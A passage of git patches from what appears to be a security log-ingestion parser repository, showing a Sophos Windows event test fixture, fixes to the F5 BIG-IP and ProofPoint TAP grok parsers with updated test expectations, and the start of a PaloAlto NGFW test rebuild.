reference\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"define_mutation_structure\\\"}],\\\"mutations\\\":{\\\"descriptions\\\":{\\\"case_descriptions\\\":{\\\"correlated_reason_id\\\":\\\"\\\",\\\"created_reason_id\\\":\\\"\\\"},\\\"detection_descriptions\\\":{\\\"created_reason_id\\\":\\\"\\\",\\\"significance_id\\\":\\\"\\\"}},\\\"entities\\\":[],\\\"labels\\\":[]},\\\"rule_hits\\\":[],\\\"rule_hits_summary\\\":{\\\"correlation\\\":[],\\\"escalation\\\":[],\\\"mutation\\\":[\\\"define_mutation_structure\\\"],\\\"suppression\\\":[]},\\\"suppression\\\":false},\\\"xdr\\\":{\\\"correlation\\\":{\\\"correlate\\\":false,\\\"id\\\":\\\"\\\",\\\"correlationIds\\\":null},\\\"mutations\\\":{},\\\"matched_rules\\\":[],\\\"labels\\\":[],\\\"rule_hits\\\":[],\\\"rule_hits_summary\\\":{\\\"correlation\\\":[],\\\"escalation\\\":[],\\\"mutation\\\":[],\\\"suppression\\\":[]},\\\"escalation\\\":false,\\\"suppression\\\":false}}\",\n  \"ingest_date\": \"2024-10-22\",\n  \"target_domain\": \"XXXX-XXXXXXXX\",\n  \"uac\": \"-\",\n  \"meta_endpoint_type\": \"computer\",\n  \"meta_domain_controller\": \"False\",\n  \"customer_id\": \"111-xxxx-xxxxx-xxxxxx111111\",\n  \"ioc_detection_description\": \"Windows Event User Account Changed.\",\n  \"message_identifier\": \"fbf30057d0b09be51ec23ca2d8354d1fe1c4329a6d52e6ed3bddca127cad105d\",\n  \"ioc_attack_type\": \"Security Event Service Detections\",\n  \"target_username\": \"TestUser\",\n  \"display_name\": \"%%XXXX\",\n  \"allowed_to_delegate_to\": \"-\",\n  \"ioc_detection_weight\": 4\n}"
+  },
+  "expected": {
+    "message": "{\n  \"upload_size\": 1406,\n  \"profile_path\": \"%%XXXX\",\n  \"record_identifier\": \"xxxxxxxxx01xxxxxxxxxxxxxxxxxxxxx\",\n  \"ioc_severity\": 4,\n  \"handler_verdicts_case_descriptions\": {\n    \"default\": \"{\\\"correlated_reason_id\\\":\\\"\\\",\\\"created_reason_id\\\":\\\"\\\"}\"\n  },\n  \"user_parameters\": \"%%XXXX\",\n  \"folded\": 0,\n  \"meta_mac_address\": \"c5:1a:64:c1:65:3a\",\n  \"endpoint_id\": \"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\",\n  \"handler_verdict_suppression_mdr\": false,\n  \"meta_public_ip_country_code\": \"FR\",\n  \"schema_version\": \"24\",\n  \"subject_logon_id\": \"0x3e7\",\n  \"ioc_detection_mitre_attack\": \"[]\",\n  \"handler_verdicts_entities\": \"[{\\\"attributes\\\":{\\\"domain_controller\\\":\\\"False\\\",\\\"endpoint_type\\\":\\\"computer\\\",\\\"hostname\\\":\\\"XXXX-XXXXXXXX\\\",\\\"id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"os_platform\\\":\\\"windows\\\",\\\"os_type\\\":\\\"\\\"},\\\"id\\\":\\\"b5c47470231d356f5cf8d90a31999db59172206adef7958ec9c650b9ce99147b\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"device\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.4\\\",\\\"external\\\":true,\\\"id\\\":\\\"263522d8b9d989b8c304a6d2f088f107b6ee0010675a11fb459b326eb27edefd\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"46ce85dc0d61d3ddc073e7a66074a8add18e75b082eef550e08863895dcbadb0\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.1\\\",\\\"external\\\":false,\\\"id\\\":\\\"ead232f295b08325f6b65bd85a8454239cd479ef30e470f594f2fcb628ec3d64\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"a2bf7ac1f3a3e09342ef4510b4d63f53100334262aa0fe8eef47a0e3642a34fe\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"}]\",\n  \"user_workstations\": \"%%XXXX\",\n  \"meta_licence\": \"MTR\",\n  \"ioc_detection_experiment_level\": 0,\n  \"privilege_list\": \"-\",\n  \"ioc_created_at\": \"2024-10-22T14:41:22.595Z\",\n  \"ingestion_timestamp\": \"2024-10-22T14:41:09.572Z\",\n  \"home_directory\": \"%%XXXX\",\n  \"ioc_detection_attack\": \"Suspicious Activity\",\n  \"numerics\": false,\n  \"eventid\": 4738,\n  \"meta_public_ip\": \"1.2.3.4\",\n  \"counter\": 0,\n  \"detection_id_dedup\": \"detectionIdDedup-xxxxxxxxxxxxxxx\",\n  \"password_last_set\": \"%%1794\",\n  \"meta_hostname\": \"XXXX-XXXXXXXX\",\n  \"ioc_detection_references\": \"[\\\"https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738\\\"]\",\n  \"ioc_worker_name\": \"Security Event Service\",\n  \"ioc_detection_type\": \"Threat\",\n  \"ioc_detection_category\": \"Threat\",\n  \"ioc_unix_time\": \"2024-10-22T14:40:48.000Z\",\n  \"epoch\": 1729607690,\n  \"meta_ip_mask\": \"255.255.252.0\",\n  \"ioc_worker_id\": \"security-event-service\",\n  \"handler_verdict_suppression_xdr\": false,\n  \"unix_time\": \"2024-10-22T14:40:48.000Z\",\n  \"ioc_log_type\": \"summary\",\n  \"query_source\": \"xdr_only\",\n  \"host_identifier\": \"hostIdentifier-xxxxxxxxxxxxxxx\",\n  \"partition_bucket\": \"87\",\n  \"home_path\": \"%%XXXX\",\n  \"meta_public_ip_country\": \"France\",\n  \"meta_boot_time\": 1729607865,\n  \"subject_username\": \"XXXX-XXXXXXXX$\",\n  \"handler_verdicts_detection_descriptions\": {\n    \"default\": \"{\\\"created_reason_id\\\":\\\"WIN-EVENT-4738\\\",\\\"significance_id\\\":\\\"WIN-EVENT-4738\\\"}\"\n  },\n  \"meta_os_name\": \"Microsoft Windows 11 Professionnel\",\n  \"osquery_action\": \"added\",\n  \"script_path\": \"%%XXXX\",\n  \"account_expires\": \"%%1794\",\n  \"meta_query_pack_version\": \"1.21.26\",\n  \"subject_domain\": \"ACOSS\",\n  \"handler_verdict_suppression\": false,\n  \"calendar_time\": \"2024-10-22T14:40:48.000Z\",\n  \"meta_eid\": \"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\",\n  \"meta_public_ip_longitude\": 2.3387,\n  \"ioc_detection_id\": \"WIN-EVENT-4738\",\n  \"meta_os_platform\": \"windows\",\n  \"meta_username\": \"\",\n  \"detection_identifier\": \"xxxxxxxxx01xxxxxxxxxxxxxxxxxxxxx_detectionIdDedup-xxxxxxxxxxxxxxx\",\n  \"handler_verdict_escalation\": false,\n  \"query_name\": \"windows_event_user_account_changed\",\n  \"provider_name\": \"Microsoft-Windows-Security-Auditing\",\n  \"meta_os_type\": \"\",\n  \"meta_os_version\": \"10.0.22631\",\n  \"sam_account_name\": \"TestUser\",\n  \"meta_public_ip_latitude\": 48.8582,\n  \"source\": \"Security\",\n  \"ioc_detection_licenses\": \"[\\\"MTR\\\",\\\"XDR\\\"]\",\n  \"user_principal_name\": \"-\",\n  \"description\": \"A User Account was changed\",\n  \"meta_aggressive_activity\": \"False\",\n  \"meta_ip_address\": \"1.2.3.1\",\n  \"handler_verdicts\": \"{\\\"default\\\":{\\\"correlation\\\":{\\\"correlate\\\":false,\\\"correlationIds\\\":null,\\\"id\\\":\\\"hostIdentifier-xxxxxxxxxxxxxxx111-xxxx-xxxxx-xxxxxx111111\\\"},\\\"escalation\\\":false,\\\"labels\\\":[],\\\"matched_rules\\\":[{\\\"description\\\":\\\"Define the mutation data structure for subsequent mutation rules to reference\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"define_mutation_structure\\\"},{\\\"description\\\":\\\"rule to normalize osquery detections\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"normalize_osquery_detections\\\"},{\\\"description\\\":\\\"Update the description in handler verdicts to add detection id\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"add_detection_id\\\"},{\\\"description\\\":\\\"Correlate Osquery detections on customer ID and host ID\\\",\\\"kb\\\":\\\"correlation\\\",\\\"name\\\":\\\"osquery_correlation_id\\\"}],\\\"mutations\\\":{\\\"descriptions\\\":{\\\"case_descriptions\\\":{\\\"correlated_reason_id\\\":\\\"\\\",\\\"created_reason_id\\\":\\\"\\\"},\\\"detection_descriptions\\\":{\\\"created_reason_id\\\":\\\"WIN-EVENT-4738\\\",\\\"significance_id\\\":\\\"WIN-EVENT-4738\\\"}},\\\"entities\\\":[{\\\"attributes\\\":{\\\"domain_controller\\\":\\\"False\\\",\\\"endpoint_type\\\":\\\"computer\\\",\\\"hostname\\\":\\\"XXXX-XXXXXXXX\\\",\\\"id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"os_platform\\\":\\\"windows\\\",\\\"os_type\\\":\\\"\\\"},\\\"id\\\":\\\"b5c47470231d356f5cf8d90a31999db59172206adef7958ec9c650b9ce99147b\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"device\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.4\\\",\\\"external\\\":true,\\\"id\\\":\\\"263522d8b9d989b8c304a6d2f088f107b6ee0010675a11fb459b326eb27edefd\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"46ce85dc0d61d3ddc073e7a66074a8add18e75b082eef550e08863895dcbadb0\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"},{\\\"attributes\\\":{\\\"address\\\":\\\"1.2.3.1\\\",\\\"external\\\":false,\\\"id\\\":\\\"ead232f295b08325f6b65bd85a8454239cd479ef30e470f594f2fcb628ec3d64\\\",\\\"type\\\":\\\"ipv4\\\"},\\\"id\\\":\\\"a2bf7ac1f3a3e09342ef4510b4d63f53100334262aa0fe8eef47a0e3642a34fe\\\",\\\"integration_id\\\":\\\"xxxxxxxx-xxxxxx-xxxxxx-xxxxxx\\\",\\\"source_system\\\":\\\"osquery\\\",\\\"type\\\":\\\"ip_address\\\"}],\\\"labels\\\":[]},\\\"rule_hits\\\":[],\\\"rule_hits_summary\\\":{\\\"correlation\\\":[\\\"osquery_correlation_id\\\"],\\\"escalation\\\":[],\\\"mutation\\\":[\\\"define_mutation_structure\\\",\\\"normalize_osquery_detections\\\",\\\"add_detection_id\\\"],\\\"suppression\\\":[]},\\\"suppression\\\":false},\\\"mdr\\\":{\\\"correlation\\\":{\\\"correlate\\\":false,\\\"correlationIds\\\":null,\\\"id\\\":\\\"\\\"},\\\"escalation\\\":false,\\\"labels\\\":[],\\\"matched_rules\\\":[{\\\"description\\\":\\\"Define the mutation data structure for subsequent mutation rules to reference\\\",\\\"kb\\\":\\\"mutation\\\",\\\"name\\\":\\\"define_mutation_structure\\\"}],\\\"mutations\\\":{\\\"descriptions\\\":{\\\"case_descriptions\\\":{\\\"correlated_reason_id\\\":\\\"\\\",\\\"created_reason_id\\\":\\\"\\\"},\\\"detection_descriptions\\\":{\\\"created_reason_id\\\":\\\"\\\",\\\"significance_id\\\":\\\"\\\"}},\\\"entities\\\":[],\\\"labels\\\":[]},\\\"rule_hits\\\":[],\\\"rule_hits_summary\\\":{\\\"correlation\\\":[],\\\"escalation\\\":[],\\\"mutation\\\":[\\\"define_mutation_structure\\\"],\\\"suppression\\\":[]},\\\"suppression\\\":false},\\\"xdr\\\":{\\\"correlation\\\":{\\\"correlate\\\":false,\\\"id\\\":\\\"\\\",\\\"correlationIds\\\":null},\\\"mutations\\\":{},\\\"matched_rules\\\":[],\\\"labels\\\":[],\\\"rule_hits\\\":[],\\\"rule_hits_summary\\\":{\\\"correlation\\\":[],\\\"escalation\\\":[],\\\"mutation\\\":[],\\\"suppression\\\":[]},\\\"escalation\\\":false,\\\"suppression\\\":false}}\",\n  \"ingest_date\": \"2024-10-22\",\n  \"target_domain\": \"XXXX-XXXXXXXX\",\n  \"uac\": \"-\",\n  \"meta_endpoint_type\": \"computer\",\n  \"meta_domain_controller\": \"False\",\n  \"customer_id\": \"111-xxxx-xxxxx-xxxxxx111111\",\n  \"ioc_detection_description\": \"Windows Event User Account Changed.\",\n  \"message_identifier\": \"fbf30057d0b09be51ec23ca2d8354d1fe1c4329a6d52e6ed3bddca127cad105d\",\n  \"ioc_attack_type\": \"Security Event Service Detections\",\n  \"target_username\": \"TestUser\",\n  \"display_name\": \"%%XXXX\",\n  \"allowed_to_delegate_to\": \"-\",\n  \"ioc_detection_weight\": 4\n}",
+    "event": {
+      "code": "WIN-EVENT-4738",
+      "ingested": "2024-10-22T14:41:09.572000Z",
+      "reason": "A User Account was changed",
+      "severity": 4
+    },
+    "@timestamp": "2024-10-22T14:40:48Z",
+    "destination": {
+      "address": "XXXX-XXXXXXXX",
+      "domain": "XXXX-XXXXXXXX"
+    },
+    "host": {
+      "domain": "ACOSS",
+      "id": "hostIdentifier-xxxxxxxxxxxxxxx",
+      "name": "XXXX-XXXXXXXX",
+      "os": {
+        "full": "Microsoft Windows 11 Professionnel",
+        "name": "windows",
+        "version": "10.0.22631"
+      }
+    },
+    "process": {
+      "name": "Security Event Service"
+    },
+    "related": {
+      "hosts": [
+        "XXXX-XXXXXXXX"
+      ],
+      "ip": [
+        "1.2.3.1",
+        "1.2.3.4"
+      ]
+    },
+    "sophos": {
+      "threat_center": {
+        "aggressive_activity": "False",
+        "detection_id_dedup": "detectionIdDedup-xxxxxxxxxxxxxxx",
+        "endpoint": {
+          "type": "computer"
+        },
+        "event": {
+          "id": 4738
+        },
+        "id": "xxxxxxxx-xxxxxx-xxxxxx-xxxxxx",
+        "ioc": {
+          "attack_type": "Security Event Service Detections",
+          "detection": {
+            "attack": "Suspicious Activity",
+            "category": "Threat",
+            "licences": [
+              "MTR",
+              "XDR"
+            ],
+            "type": "Threat",
+            "weight": "4"
+          },
+          "log_type": "summary",
+          "unix_time": "2024-10-22T14:40:48.000000Z"
+        },
+        "message": {
+          "id": "fbf30057d0b09be51ec23ca2d8354d1fe1c4329a6d52e6ed3bddca127cad105d"
+        },
+        "query": {
+          "action": "added",
+          "name": "windows_event_user_account_changed",
+          "pack_version": "1.21.26",
+          "source": "xdr_only"
+        },
+        "record_identifier": "xxxxxxxxx01xxxxxxxxxxxxxxxxxxxxx",
+        "worker": {
+          "id": "security-event-service"
+        }
+      }
+    },
+    "source": {
+      "address": "1.2.3.1",
+      "bytes": 1406,
+      "geo": {
+        "country_iso_code": "FR",
+        "country_name": "France"
+      },
+      "ip": "1.2.3.1",
+      "mac": "c5:1a:64:c1:65:3a",
+      "nat": {
+        "ip": "1.2.3.4"
+      }
+    },
+    "user": {
+      "target": {
+        "name": "TestUser"
+      }
+    },
+    "vulnerability": {
+      "description": "Windows Event User Account Changed.",
+      "reference": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4738"
+    }
+  }
+}
\ No newline at end of file

From e1447b4fecbbf3dfa65bbea609cb0d9afe35accd Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 30 Oct 2024 13:56:40 +0200
Subject: [PATCH 183/317] Fix F5 Big-Ip

---
 F5 Networks/f5-big-ip/ingest/parser.yml       | 71 ++++++++-----------
 .../f5-big-ip/tests/test_apm_access_1.json    |  3 +-
 .../f5-big-ip/tests/test_apm_access_2.json    |  3 +-
 .../f5-big-ip/tests/test_apm_access_3.json    |  3 +-
 .../f5-big-ip/tests/test_apm_access_4.json    |  3 +-
 .../f5-big-ip/tests/test_apm_auth_1.json      |  3 +
 .../f5-big-ip/tests/test_apm_auth_2.json      |  3 +
 .../f5-big-ip/tests/test_apm_auth_3.json      |  3 +
 8 files changed, 47 insertions(+), 45 deletions(-)

diff --git a/F5 Networks/f5-big-ip/ingest/parser.yml b/F5 Networks/f5-big-ip/ingest/parser.yml
index 0147bdd4b..940e3bc4c 100644
--- a/F5 Networks/f5-big-ip/ingest/parser.yml	
+++ b/F5 Networks/f5-big-ip/ingest/parser.yml	
@@ -8,7 +8,7 @@ pipeline:
       name: grok.match
       properties:
         output_field: message
-        pattern: '\s?(%{CRON_LOG}|%{LOGGER_LOG}|%{SSH_LOG}|%{RULE_LOG}|%{RULE_LOG_REASON_ONLY}|%{AUDIT_LOG}|%{ARROW}|%{VPN_LOG})'
+        pattern: '\s?(%{CRON_LOG}|%{LOGGER_LOG}|%{SSH_LOG}|%{RULE_LOG}|%{RULE_LOG_REASON_ONLY}|%{AUDIT_LOG}|%{ARROW}|%{VPN_LOG}|%{APM_EVENT}|%{KV_HEADERS})'
         custom_patterns:
           TLS: "TLSv"
           HEADER: '%{WORD:action_type}\[\d*\]'
@@ -49,6 +49,22 @@ pipeline:
           # vpn messages
           VPN_PROTOCOL: "tcp|udp"
           VPN_LOG: '%{DATA}\:\s*%{WORD}\:\s*%{WORD}\:\s*%{WORD:action_name} ACL\:\s*(%{DATA:rule_name}\:%{NUMBER})\s*packet\:\s*%{VPN_PROTOCOL:network_transport}\s*%{IPORHOST:source_ip}:%{POSINT:source_port} -> %{IPORHOST:destination_ip}:%{POSINT:destination_port}'
+
+          # apm events
+          APM_EVENT: '%{APM_HEADER}?%{DATA:rule_name}\:\s*%{WORD}\:\s*%{WORD}\:\s*%{APM_PAYLOAD}'
+          APM_HEADER: "%{APM_HEADER_1}|%{APM_HEADER_2}"
+          APM_HEADER_1: '%{DATA:date} %{TIME:time} %{IPORHOST:source_domain} %{DATA:action_type} %{DATA}\[\d*\]:\s*(\d*:\d*: )'
+          APM_HEADER_2: '%{WORD:action_type}\[\d*\]:\s*(\d*:\d*: )'
+          APM_PAYLOAD: "%{APM_PAYLOAD_USER}|%{APM_PAYLOAD_USER_AUTH_WITH_DOMAIN}|%{APM_PAYLOAD_USER_AUTH}|%{APM_PAYLOAD_NEW_SESSION}|%{APM_PAYLOAD_ACCESS}"
+          APM_PAYLOAD_USER: "Username '%{DATA:user_name}'"
+          APM_PAYLOAD_USER_AUTH: ".*authenticate with '%{DATA:user_name}'.*"
+          APM_PAYLOAD_USER_AUTH_WITH_DOMAIN: ".*authenticate with '%{DATA:user_name}@%{DATA:user_domain}'.*"
+          APM_PAYLOAD_NEW_SESSION: 'New session from \s*client IP %{IP:src_ip} \(%{DATA}\) at VIP %{IP:dest_ip}.*'
+          APM_PAYLOAD_ACCESS: "Following rule '%{DATA:rule_name}' from item '%{DATA:rule_item}' to %{DATA} '%{DATA}'"
+
+          # kv headers
+          KV_HEADERS: 'Rule %{DATA:rule_name} %{DATA}\:\s*%{GREEDYDATA:kvs}'
+
     filter: '{{"CEF:0|" not in original.message}}'
 
   - name: parse_cef_event
@@ -69,25 +85,16 @@ pipeline:
         item_sep: '\r\n'
     filter: "{{parse_cef_event.message != null and parse_cef_event.message.full_request != null}}"
 
-  - name: parse_kv_header
-    external:
-      name: grok.match
-      properties:
-        input_field: "{{original.message}}"
-        output_field: message
-        pattern: '\s*Rule %{DATA:rule_name} %{DATA}\:\s*%{GREEDYDATA:kvs}'
-    filter: '{{"CEF:0|" not in original.message}}'
-
   - name: parse_kv_event
     external:
       name: kv.parse-kv
       properties:
         raise_errors: false
-        input_field: "{{ parse_kv_header.message.kvs }}"
+        input_field: "{{ parse_grok_event.message.kvs }}"
         output_field: message
         value_sep: "="
         item_sep: " "
-    filter: "{{parse_kv_header.message != None and parse_kv_header.message.kvs != None}}"
+    filter: "{{parse_grok_event.message != None and parse_grok_event.message.kvs != None}}"
 
   - name: parse_audit_message
     external:
@@ -108,26 +115,8 @@ pipeline:
         output_field: datetime
     filter: "{{ parse_cef_event.message != None }}"
 
-  - name: parse_apm_event
-    external:
-      name: grok.match
-      properties:
-        raise_errors: false
-        output_field: message
-        pattern: '%{HEADER}?%{DATA:rule_name}\:\s*%{WORD}\:\s*%{WORD}\:\s*%{PAYLOAD}'
-        custom_patterns:
-          HEADER: "%{HEADER_1}|%{HEADER_2}"
-          HEADER_1: '%{DATA:date} %{TIME:time} %{IPORHOST:source_domain} %{DATA:action_type} %{DATA}\[\d*\]:\s*(\d*:\d*: )'
-          HEADER_2: '\s*%{WORD:action_type}\[\d*\]:\s*(\d*:\d*: )'
-          PAYLOAD: "%{PAYLOAD_USER}|%{PAYLOAD_USER_AUTH_WITH_DOMAIN}|%{PAYLOAD_USER_AUTH}|%{PAYLOAD_NEW_SESSION}|%{PAYLOAD_ACCESS}"
-          PAYLOAD_USER: "Username '%{DATA:user_name}'"
-          PAYLOAD_USER_AUTH: ".*authenticate with '%{DATA:user_name}'.*"
-          PAYLOAD_USER_AUTH_WITH_DOMAIN: ".*authenticate with '%{DATA:user_name}@%{DATA:user_domain}'.*"
-          PAYLOAD_NEW_SESSION: 'New session from \s*client IP %{IP:src_ip} \(%{DATA}\) at VIP %{IP:dest_ip}.*'
-          PAYLOAD_ACCESS: "Following rule '%{DATA:rule_name}' from item '%{DATA:rule_item}' to %{DATA} '%{DATA}'"
-
   - name: set_apm_event
-    filter: "{{ parse_apm_event.message != None }}"
+    filter: "{{ parse_grok_event.message.get('APM_EVENT') != None }}"
 
   - name: set_cef_fields
     filter: "{{ parse_cef_event.message != None }}"
@@ -304,7 +293,7 @@ stages:
   set_kv_fields:
     actions:
       - set:
-          rule.name: "{{parse_kv_header.message.rule_name}}"
+          rule.name: "{{parse_grok_event.message.rule_name}}"
 
           source.ip: "{{parse_kv_event.message.client_ip}}"
           source.port: "{{parse_kv_event.message.client_port}}"
@@ -339,19 +328,19 @@ stages:
 
       - set:
           event.type: ["start"]
-        filter: "{{parse_apm_event.message.PAYLOAD_USER_AUTH != None or parse_apm_event.message.PAYLOAD_USER_AUTH_WITH_DOMAIN != None}}"
+        filter: "{{parse_grok_event.message.APM_PAYLOAD_USER_AUTH != None or parse_grok_event.message.APM_PAYLOAD_USER_AUTH_WITH_DOMAIN != None}}"
 
       - set:
-          rule.name: "{{parse_apm_event.message.rule_name}}"
-          f5.bigip.apm.rule_item: "{{parse_apm_event.message.rule_item}}"
-          source.domain: "{{parse_apm_event.message.source_domain}}"
-        filter: "{{parse_apm_event.message.PAYLOAD_ACCESS != None}}"
+          rule.name: "{{parse_grok_event.message.rule_name}}"
+          f5.bigip.apm.rule_item: "{{parse_grok_event.message.rule_item}}"
+          source.domain: "{{parse_grok_event.message.source_domain}}"
+        filter: "{{parse_grok_event.message.APM_PAYLOAD_ACCESS != None}}"
 
       - set:
           action.target: "network-traffic"
 
-          user.name: "{{parse_apm_event.message.user_name}}"
-          user.domain: "{{parse_apm_event.message.user_domain}}"
+          user.name: "{{parse_grok_event.message.user_name}}"
+          user.domain: "{{parse_grok_event.message.user_domain}}"
 
-          source.ip: "{{parse_apm_event.message.src_ip}}"
-          destination.ip: "{{parse_apm_event.message.dest_ip}}"
+          source.ip: "{{parse_grok_event.message.src_ip}}"
+          destination.ip: "{{parse_grok_event.message.dest_ip}}"
diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_1.json b/F5 Networks/f5-big-ip/tests/test_apm_access_1.json
index 570d31153..2a070a18c 100644
--- a/F5 Networks/f5-big-ip/tests/test_apm_access_1.json	
+++ b/F5 Networks/f5-big-ip/tests/test_apm_access_1.json	
@@ -13,7 +13,8 @@
       ]
     },
     "action": {
-      "target": "network-traffic"
+      "target": "network-traffic",
+      "type": "notice"
     },
     "f5": {
       "bigip": {
diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_2.json b/F5 Networks/f5-big-ip/tests/test_apm_access_2.json
index f7f583da3..a4bccca42 100644
--- a/F5 Networks/f5-big-ip/tests/test_apm_access_2.json	
+++ b/F5 Networks/f5-big-ip/tests/test_apm_access_2.json	
@@ -13,7 +13,8 @@
       ]
     },
     "action": {
-      "target": "network-traffic"
+      "target": "network-traffic",
+      "type": "notice"
     },
     "f5": {
       "bigip": {
diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_3.json b/F5 Networks/f5-big-ip/tests/test_apm_access_3.json
index 4b3b16a1f..c2801ee87 100644
--- a/F5 Networks/f5-big-ip/tests/test_apm_access_3.json	
+++ b/F5 Networks/f5-big-ip/tests/test_apm_access_3.json	
@@ -13,7 +13,8 @@
       ]
     },
     "action": {
-      "target": "network-traffic"
+      "target": "network-traffic",
+      "type": "notice"
     },
     "f5": {
       "bigip": {
diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_4.json b/F5 Networks/f5-big-ip/tests/test_apm_access_4.json
index d2b42ada9..61bb4a141 100644
--- a/F5 Networks/f5-big-ip/tests/test_apm_access_4.json	
+++ b/F5 Networks/f5-big-ip/tests/test_apm_access_4.json	
@@ -13,7 +13,8 @@
       ]
     },
     "action": {
-      "target": "network-traffic"
+      "target": "network-traffic",
+      "type": "notice"
     },
     "f5": {
       "bigip": {
diff --git a/F5 Networks/f5-big-ip/tests/test_apm_auth_1.json b/F5 Networks/f5-big-ip/tests/test_apm_auth_1.json
index c123b3d38..4e15d0ce1 100644
--- a/F5 Networks/f5-big-ip/tests/test_apm_auth_1.json	
+++ b/F5 Networks/f5-big-ip/tests/test_apm_auth_1.json	
@@ -24,6 +24,9 @@
         "johndoe"
       ]
     },
+    "rule": {
+      "name": "/Common/SAML_OCTIME"
+    },
     "user": {
       "name": "johndoe"
     }
diff --git a/F5 Networks/f5-big-ip/tests/test_apm_auth_2.json b/F5 Networks/f5-big-ip/tests/test_apm_auth_2.json
index 70442e2a3..15fc392c6 100644
--- a/F5 Networks/f5-big-ip/tests/test_apm_auth_2.json	
+++ b/F5 Networks/f5-big-ip/tests/test_apm_auth_2.json	
@@ -24,6 +24,9 @@
         "johndoe"
       ]
     },
+    "rule": {
+      "name": "/Common/SAML_OCTIME"
+    },
     "user": {
       "name": "johndoe"
     }
diff --git a/F5 Networks/f5-big-ip/tests/test_apm_auth_3.json b/F5 Networks/f5-big-ip/tests/test_apm_auth_3.json
index a2559de32..ec33a6238 100644
--- a/F5 Networks/f5-big-ip/tests/test_apm_auth_3.json	
+++ b/F5 Networks/f5-big-ip/tests/test_apm_auth_3.json	
@@ -24,6 +24,9 @@
         "johndoe"
       ]
     },
+    "rule": {
+      "name": "/Common/SAML_OCTIME"
+    },
     "user": {
       "domain": "EXAMPLE.ORG",
       "name": "johndoe"

From 12f236fb1e75e8c62e777277e04663f04273f641 Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 30 Oct 2024 14:06:39 +0200
Subject: [PATCH 184/317] Fix ProofPoint tap

---
 ProofPoint/proofpoint-tap/ingest/parser.yml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/ProofPoint/proofpoint-tap/ingest/parser.yml b/ProofPoint/proofpoint-tap/ingest/parser.yml
index 51d353695..73a4a3375 100644
--- a/ProofPoint/proofpoint-tap/ingest/parser.yml
+++ b/ProofPoint/proofpoint-tap/ingest/parser.yml
@@ -9,6 +9,7 @@ pipeline:
     external:
       name: grok.match
       properties:
+        raise_errors: false
         input_field: "{{json_event.message.messageID}}"
         output_field: message
         pattern: "<%{MESSAGE_ID}>|%{MESSAGE_ID}"

From 7e610dee4d6545a0ead2a4094c0bd90eed9d379e Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Wed, 30 Oct 2024 14:45:27 +0200
Subject: [PATCH 185/317] Rebuild tests for PaloAlto NGFW

---
 .../paloalto-ngfw/tests/User_id_1_csv.json    |  9 +-------
 .../paloalto-ngfw/tests/User_id_2_csv.json    |  9 +-------
 .../paloalto-ngfw/tests/auth_cef.json         |  7 ------
 .../paloalto-ngfw/tests/decryption_cef.json   |  3 ---
 .../paloalto-ngfw/tests/file_cef.json         |  4 ----
 .../paloalto-ngfw/tests/fix_bug_with_int.json |  3 +--
 .../tests/fix_bug_without_int.json            |  3 +--
 .../tests/globalprotect_cef.json              |  1 -
 .../tests/globalprotect_csv.json              |  2 --
 .../tests/globalprotect_csv_2.json            |  2 --
 .../paloalto-ngfw/tests/hip_match_cef.json    |  3 ---
 .../paloalto-ngfw/tests/icmp_allow_csv.json   |  3 +--
 .../paloalto-ngfw/tests/iptag_cef.json        |  4 ----
 .../tests/network_threat_alert_1.json         |  8 +------
 .../tests/network_threat_alert_2.json         |  9 +-------
 .../paloalto-ngfw/tests/sctp_cef.json         |  4 ----
 .../paloalto-ngfw/tests/system_csv.json       |  5 ----
 .../paloalto-ngfw/tests/tcp_allow_csv.json    |  3 +--
 .../tests/test_cloud_election_json.json       |  4 ----
 .../tests/test_dhcp_renew_json.json           |  4 ----
 .../tests/test_dns_proxy_json.json            |  4 ----
 .../tests/test_file_alert_json.json           |  8 +------
 .../tests/test_globalprotect.json             |  2 --
 .../tests/test_installed_package_json.json    |  4 ----
 .../tests/test_ldap_brute_force.json          |  8 +------
 .../tests/test_new_file_type.json             |  8 +------
 .../tests/test_new_globalprotect.json         |  5 ----
 .../tests/test_new_threat_type.json           |  5 ----
 .../tests/test_new_url_type.json              |  8 +------
 .../tests/test_ntp_sync_json.json             |  4 ----
